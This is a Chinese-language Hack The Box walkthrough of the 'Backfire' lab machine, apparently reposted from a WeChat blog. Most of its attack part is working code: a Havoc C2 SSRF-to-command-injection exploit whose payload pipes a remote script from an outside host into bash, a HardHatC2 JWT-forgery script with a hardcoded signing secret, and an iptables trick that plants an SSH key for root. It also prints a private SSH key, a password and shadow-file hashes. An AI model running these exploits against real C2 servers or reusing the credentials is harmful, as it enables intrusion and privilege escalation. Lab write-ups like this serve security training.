HTB-Backfire

admin 2025年1月21日23:18:05评论354 views字数 17009阅读56分41秒阅读模式
HTB-Backfire
(打完了出去就可以吹逼说自己反制了世界第一的红队基础设施!!lol)
扫描靶机
nmap -A -v -T4 10.10.11.49
HTB-Backfire
跑出了几个端口,443,5000,有个8000端口,显示跟havoc.yaolt文件有关,这个havoc的c2的profile文件
https://havocframework.com/docs/profiles
HTB-Backfire
进去端口看看,443端口没东西,从8000端口下手
HTB-Backfire
HTB-Backfire
可以看到有两个文件,一个是havoc的profile,一个是补丁,都下载下来看看
HTB-Backfire
这段代码是禁用 WebSocket 连接的 TLS/SSL 加密(端口 40056),这个端口只允许本地连接
HTB-Backfire
这是一段profile的内容,可以得知用户名是ilya和sergej,可以利用这个登录一下
HTB-Backfire
HTB-Backfire
是可以登录的,但是里面没什么东西,这两个用户都可以登录,搜一下关于havoc的poc可以找到一个ssrf的漏洞
HTB-Backfire
第一个poc的利用

https://github.com/chebuya/Havoc-C2-SSRF-poc

HTB-Backfire

https://github.com/syncwithali/HavocExploit

HTB-Backfire
HTB-Backfire
直接使用第一个ssrf的poc
HTB-Backfire
ssrf可以成功使用,然后测试getshell的功能,直接搜havoc可以弹出一个rce
HTB-Backfire

https://github.com/IncludeSecurity/c2-vulnerabilities.git

直接使用第一个,然后看一下文档
HTB-Backfire
看了代码好像需要ws协议,通过 ws协议与teamserver进行通信,进行身份验证并创建一个伪终端
HTB-Backfire
HTB-Backfire
可以进行反弹shell,然后在原本的脚本上增加一个ws协议,修改代码,进行反弹shell
import osimport jsonimport hashlibimport binasciiimport randomimport requestsimport argparseimport urllib3from Crypto.Cipher import AESfrom Crypto.Util import Counterurllib3.disable_warnings()key_bytes = 32def decrypt(key, iv, ciphertext):    if len(key) <= key_bytes:        for _ in range(len(key), key_bytes):            key += b"0"    assert len(key) == key_bytes    iv_int = int(binascii.hexlify(iv), 16)    ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)    aes = AES.new(key, AES.MODE_CTR, counter=ctr)    plaintext = aes.decrypt(ciphertext)    return plaintextdef int_to_bytes(value, length=4, byteorder="big"):    return value.to_bytes(length, byteorder)def encrypt(key, iv, plaintext):    if len(key) <= key_bytes:        for x in range(len(key), key_bytes):            key = key + b"0"        assert len(key) == key_bytes        iv_int = int(binascii.hexlify(iv), 16)        ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)        aes = AES.new(key, AES.MODE_CTR, counter=ctr)        ciphertext = aes.encrypt(plaintext)        return ciphertextdef register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):    command = b"x00x00x00x63"    request_id = b"x00x00x00x01"    demon_id = agent_id    hostname_length = int_to_bytes(len(hostname))    username_length = int_to_bytes(len(username))    domain_name_length = int_to_bytes(len(domain_name))    internal_ip_length = int_to_bytes(len(internal_ip))    process_name_length = int_to_bytes(len(process_name) - 6)    data = b"xab" * 100    header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data    size = 12 + len(header_data)    size_bytes = size.to_bytes(4, 'big')    agent_header = size_bytes + magic + agent_id    print(agent_header + header_data)    print("[+] Trying to register agent...")    r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)    if r.status_code == 200:        print("[+] Success!")    else:        print(f"[-] Failed to register agent - {r.status_code} {r.text}")def open_socket(socket_id, target_address, target_port):    command = b"x00x00x09xec"    request_id = b"x00x00x00x02"    subcommand = b"x00x00x00x10"    sub_request_id = b"x00x00x00x03"    local_addr = b"x22x22x22x22"    local_port = b"x33x33x33x33"    forward_addr = b""    for octet in target_address.split(".")[::-1]:        forward_addr += int_to_bytes(int(octet), length=1)    forward_port = int_to_bytes(target_port)    package = subcommand + socket_id + local_addr + local_port + forward_addr + forward_port    package_size = int_to_bytes(len(package) + 4)    header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)    size = 12 + len(header_data)    size_bytes = size.to_bytes(4, 'big')    agent_header = size_bytes + magic + agent_id    data = agent_header + header_data    print("[+] Trying to open socket on the teamserver...")    r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)    if r.status_code == 200:        print("[+] Success!")    else:        print(f"[-] Failed to open socket on teamserver - {r.status_code} {r.text}")def write_socket(socket_id, data):    command = b"x00x00x09xec"    request_id = b"x00x00x00x08"    subcommand = b"x00x00x00x11"    sub_request_id = b"x00x00x00xa1"    socket_type = b"x00x00x00x03"    success = b"x00x00x00x01"    data_length = int_to_bytes(len(data))    package = subcommand + socket_id + socket_type + success + data_length + data    package_size = int_to_bytes(len(package) + 4)    header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)    size = 12 + len(header_data)    size_bytes = size.to_bytes(4, 'big')    agent_header = size_bytes + magic + agent_id    post_data = agent_header + header_data    print(post_data)    print("[+] Trying to write to the socket")    r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)    if r.status_code == 200:        print("[+] Success!")    else:        print(f"[-] Failed to write data to the socket - {r.status_code} {r.text}")def read_socket(socket_id):    command = b"x00x00x00x01"    request_id = b"x00x00x00x09"    header_data = command + request_id    size = 12 + len(header_data)    size_bytes = size.to_bytes(4, 'big')    agent_header = size_bytes + magic + agent_id    data = agent_header + header_data    print("[+] Trying to poll teamserver for socket output...")    r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)    if r.status_code == 200:        print("[+] Read socket output successfully!")    else:        print(f"[-] Failed to read socket output - {r.status_code} {r.text}")        return ""    command_id = int.from_bytes(r.content[0:4], "little")    request_id = int.from_bytes(r.content[4:8], "little")    package_size = int.from_bytes(r.content[8:12], "little")    enc_package = r.content[12:]    return decrypt(AES_Key, AES_IV, enc_package)[12:]def create_websocket_request(host, port):    request = (        f"GET /havoc/ HTTP/1.1rn"        f"Host: {host}:{port}rn"        f"Upgrade: websocketrn"        f"Connection: Upgradern"        f"Sec-WebSocket-Key: 5NUvQyzkv9bpu376gKd2Lg==rn"        f"Sec-WebSocket-Version: 13rn"        f"rn"    ).encode()    return requestdef build_websocket_frame(payload):    payload_bytes = payload.encode("utf-8")    frame = bytearray()    frame.append(0x81)    payload_length = len(payload_bytes)    if payload_length <= 125:        frame.append(0x80 | payload_length)    elif payload_length <= 65535:        frame.append(0x80 | 126)        frame.extend(payload_length.to_bytes(2, byteorder="big"))    else:        frame.append(0x80 | 127)        frame.extend(payload_length.to_bytes(8, byteorder="big"))    masking_key = os.urandom(4)    frame.extend(masking_key)    masked_payload = bytearray(byte ^ masking_key[i % 4] for i, byte in enumerate(payload_bytes))    frame.extend(masked_payload)    return frameparser = argparse.ArgumentParser()parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)parser.add_argument("-A", "--user-agent", help="The User-Agent for the spoofed agent", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")args = parser.parse_args()magic = b"xdexadxbexef"teamserver_listener_url = args.targetheaders = {    "User-Agent": args.user_agent}agent_id = int_to_bytes(random.randint(100000, 1000000))AES_Key = b"x00" * 32AES_IV = b"x00" * 16hostname = bytes(args.hostname, encoding="utf-8")username = bytes(args.username, encoding="utf-8")domain_name = bytes(args.domain_name, encoding="utf-8")internal_ip = bytes(args.internal_ip, encoding="utf-8")process_name = args.process_name.encode("utf-16le")process_id = int_to_bytes(random.randint(1000, 5000))register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)socket_id = b"x11x11x11x11"open_socket(socket_id, args.ip, int(args.port))USER = "ilya"PASSWORD = "CobaltStr1keSuckz!"host = "127.0.0.1"port = 40056websocket_request = create_websocket_request(host, port)write_socket(socket_id, websocket_request)response = read_socket(socket_id)payload = {"Body": {"Info": {"Password": hashlib.sha3_256(PASSWORD.encode()).hexdigest(), "User": USER}, "SubEvent": 3}, "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": USER}}payload_json = json.dumps(payload)frame = build_websocket_frame(payload_json)write_socket(socket_id, frame)response = read_socket(socket_id)payload = {"Body":{"Info":{"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round-robin","Hosts":"0.0.0.0","Name":"abc","PortBind":"443","PortConn":"443","Protocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head":{"Event":2,"OneTime":"","Time":"08:39:18","User": USER}}payload_json = json.dumps(payload)frame = build_websocket_frame(payload_json)write_socket(socket_id, frame)response = read_socket(socket_id)cmd = "curl http://10.10.14.9/rce.sh | bash" injection = """ \\\" -mbla; """ + cmd + """ 1>&2 && false #"""payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{n    "Amsi/Etw Patch": "None",n    "Indirect Syscall": false,n    "Injection": {n        "Alloc": "Native/Syscall",n        "Execute": "Native/Syscall",n        "Spawn32": "C:\\Windows\\SysWOW64\\notepad.exe",n        "Spawn64": "C:\\Windows\\System32\\notepad.exe"n    },n    "Jitter": "0",n    "Proxy Loading": "None (LdrLoadDll)",n    "Service Name":"" + injection + "",n    "Sleep": "2",n    "Sleep Jmp Gadget": "None",n    "Sleep Technique": "WaitForSingleObjectEx",n    "Stack Duplication": falsen}n", "Format": "Windows Service Exe", "Listener": "abc"}, "SubEvent": 2}, "Head": {"Event": 5, "OneTime": "true", "Time": "18:39:04", "User": USER}}payload_json = json.dumps(payload)frame = build_websocket_frame(payload_json)write_socket(socket_id, frame)response = read_socket(socket_id)command:python3 havoc_rce.py --target https://10.10.11.49/ -i 127.0.0.1 -p 40056
HTB-Backfire
成功反弹shell,里面的这个文本好像对havoc的想法
HTB-Backfire
打开后台端口可以看到有个7096
HTB-Backfire
将其代理出来,但是有时候会突然断线,直接找到id_rsa登录吧,他这个密钥是需要自己创建的
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
HTB-Backfire
HTB-Backfire
需要同时代理两个端口,然后在浏览器打开7096
HTB-Backfire
HTB-Backfire
可以看到是一个c2,admin默认是等不进去的,可以参考这个,有一个rce
https://blog.sth.sh/hardhatc2-0-days-rce-authn-bypass-96ba683d9dd7
先使用密钥生成一个管理员权限的 jwt,利用该 JWT 向服务器发送请求,注册一个新用户,然后直接登录
import jwtimport datetimeimport uuidimport requests# Configurationrhost = '127.0.0.1:5000'  # Host for the API endpointsecret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq"  # Secret key for JWT signingissuer = "hardhatc2.com"  # Issuer of the JWT# Debug: Print configuration settingsprint("[+] Configuration set:")print(f"    rhost: {rhost}")print(f"    secret: {secret[:5]}...")  # Print part of the secret to avoid full exposureprint(f"    issuer: {issuer}")# Create JWT Token for Admin usernow = datetime.datetime.utcnow()  # Get current UTC timeexpiration = now + datetime.timedelta(days=28)  # Set expiration date for 28 days from now# Debug: Show time informationprint("[+] Current UTC time:", now)print("[+] Expiration time:", expiration)# Define JWT Payloadpayload = {    "sub": "HardHat_Admin",  # Subject (the user that the token is for)    "jti": str(uuid.uuid4()),  # Unique identifier for the token    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1",  # Name identifier    "iss": issuer,  # Issuer of the token    "aud": issuer,  # Audience for the token    "iat": int(now.timestamp()),  # Issued at time (in seconds since epoch)    "exp": int(expiration.timestamp()),  # Expiration time (in seconds since epoch)    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator"  # Role of the user}# Debug: Show payload before encodingprint("[+] JWT Payload:")for key, value in payload.items():    print(f"    {key}: {value}")# Encode JWT with the secret and HS256 algorithmtoken = jwt.encode(payload, secret, algorithm="HS256")# Debug: Show generated JWT token (first 50 characters for brevity)print("[+] Generated JWT (first 50 chars):")print(token[:50])# Use Admin JWT to create a new user 'pfapostol' as TeamLeadburp0_url = f"https://{rhost}/Login/Register"  # URL for the user registration endpoint# Debug: Show the URL for registrationprint("[+] Sending request to URL:", burp0_url)# Set headers for the request including the Authorization tokenburp0_headers = {    "Authorization": f"Bearer {token}",    "Content-Type": "application/json"}# JSON data to register the new userburp0_json = {    "password": "pfapostol",  # Password for the new user    "role": "TeamLead",  # Role to be assigned to the new user    "username": "pfapostol"  # Username for the new user}# Debug: Show headers and payload for the requestprint("[+] Headers and JSON payload:")print("    Headers:", burp0_headers)print("    JSON Payload:", burp0_json)# Send the POST request to register the new userr = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)# Debug: Show response status and contentprint("[+] Response status code:", r.status_code)print("[+] Response content:", r.text)
HTB-Backfire
然后直接登录,默认账号是 pfapostol:pfapostol
HTB-Backfire
登录成功,在做左边的栏目上可以找到一个终端
HTB-Backfire
直接使用bash反弹一个shell
HTB-Backfire
输入sudo -l可以看到提权信息
HTB-Backfire
可以看到是通过防火墙规则来进行提权,首先生成ed25519密钥
HTB-Backfire
先在INPUT链上添加一个规则,允许所有通过本地回环接口 (lo) 进入的流量,并且将ssh公钥添加为注释,然后通过iptables-save将规则保存到root的authorized_keys
sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFafyRywbrdQjXxVMl1rKsXLVdY4xnkFTNAAkDGRPsiJ root@v-vn'sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
HTB-Backfire
成功拿到root
root:$y$j9T$YhphiLO.G4w3yAv438MQP/$3JhvSgFS6VV4F79Mi5VuQDkhg63yMgjbpy.krot/tn.:19996:0:99999:7:::daemon:*:19993:0:99999:7:::bin:*:19993:0:99999:7:::sys:*:19993:0:99999:7:::sync:*:19993:0:99999:7:::games:*:19993:0:99999:7:::man:*:19993:0:99999:7:::lp:*:19993:0:99999:7:::mail:*:19993:0:99999:7:::news:*:19993:0:99999:7:::uucp:*:19993:0:99999:7:::proxy:*:19993:0:99999:7:::www-data:*:19993:0:99999:7:::backup:*:19993:0:99999:7:::list:*:19993:0:99999:7:::irc:*:19993:0:99999:7:::_apt:*:19993:0:99999:7:::nobody:*:19993:0:99999:7:::systemd-network:!*:19993::::::systemd-timesync:!*:19993::::::messagebus:!:19993::::::ilya:$y$j9T$QAKBQrxLvdJTOvPiSUD8Z.$970OYpnfl/koGTRGPbmxntWv/HzGp5Nrjr7Vwfv6NXA:19996:0:99999:7:::sshd:!:19993::::::sergej:$y$j9T$ToRPOlaRsEcSVPj7IrwIw/$7WM.jKKviRj8JoXWN2pjVqrxuunYDv/G4b0PHmsEFd2:19996:0:99999:7:::_laurel:!:20069::::::

原文始发于微信公众号(Jiyou too beautiful):HTB-Backfire

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月21日23:18:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Backfirehttps://cn-sec.com/archives/3654370.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息